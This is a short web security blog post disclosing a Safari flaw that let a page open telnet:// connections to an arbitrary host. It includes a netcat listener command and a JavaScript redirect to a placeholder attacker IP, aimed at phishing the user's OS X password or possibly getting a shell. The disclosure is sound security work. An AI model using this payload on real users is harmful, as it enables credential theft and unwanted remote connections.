The Spanner logo
    • Home
    • Blog
      • Blog home
      • RSS
    • Login
    • Home
    • Blog
      • Blog home
      • RSS
    • Login
    The Spanner logo

    The Spanner
    Web security blog

    Made by Gareth Heyes
    Follow me on Twitter: @garethheyes

    Javascript for hackers!

    Hackvertor logo
    Shazzer logo
    My Github account
    Recent posts
    Introducing Feedworm: A Privacy-First RSS Reader That Lives in DevToolsSpeedy RSVP extensionAutoVaderHackvertor history and tag finderShadow Repeater v1.2.3 releaseBurp Hackvertor v2.1.24 releaseHacking roomsXSSing TypeErrors in SafarivalueOf: Another way to get thisMaking the Unexploitable Exploitable with X-Mixed-Replace on FirefoxThe curious case of the evt parameterCSS-Only Tic Tac Toe ChallengeRewriting relative urls with the base tag in SafariBypassing DOMPurify with mXSSNew IE mutation vectorHow I smashed MentalJSMentalJS DOM bypassAnother XSS auditor bypassXSS Auditor bypassBypassing the IE XSS filterUnbreakable filterMentalJS bypassesmXSSJava SerializationBypassing the XSS filter using function reassignmentRPOSandboxed jQueryX-Domain scroll detection on IE using focusEpic fail IEnew operatorDecoding complex non-alphanumeric JavaScriptHacking FirefoxDOM ClobberingBypassing XSS AuditorThe evolution of codeNon-Alpha PHP in 6-7 charsetTweetable PHP-Non AlphaMentalJS for PHPOpera x domain with video tutorialSandboxing and parsing jQuery in 100ms

    Safari security

    By Gareth Heyes (@hackvertor)

    Published 18 years 5 months ago • Last updated March 22, 2025 • ⏱️ 2 min read

    ← Back to articles

    Well what do you do when you report a bug to Apple and the deny it is even a problem?

    Turn it into a remote one.

    What do you do when they don't provide you with any credit whatsoever? Give up? Stop testing Safari? Or drink lots of coffee and red bull, stay up all night hacking the hell out of their browser? I went for the last one :) You see Apple I don't really care if you don't provide me credit or not I just like hacking browsers :P

    Ok onto the fun. Apple seem to have some sort of security related breakdown because they allow the telnet protocol. On top of that they allow it to automatically connect and to any address. Yeah crazy eh? Can you see where this is going? :) Take the following simple example:-

    The attacker opens up a terminal on any remote machine:- nc -vv -l -p 3000

    The above command listens for incoming connections on port 3000. The attacker then tricks a user to visiting their evil web page:-

    <pre lang="javascript"> &lt;script type=&quot;text/javascript&quot;&gt; // x.x.x.x = attackers remote ip self.location = 'telnet://x.x.x.x:3000'; &lt;/script&gt; </pre>

    A connection is then established between the user and the attacker, the attacker can prompt the user to enter their OS X password etc, it may be even possible to execute a interactive shell. All not good I'm sure you'll agree.

    To make Safari secure simply select the Safari icon in applications and drag it to the waste bin.

    ← Back to articles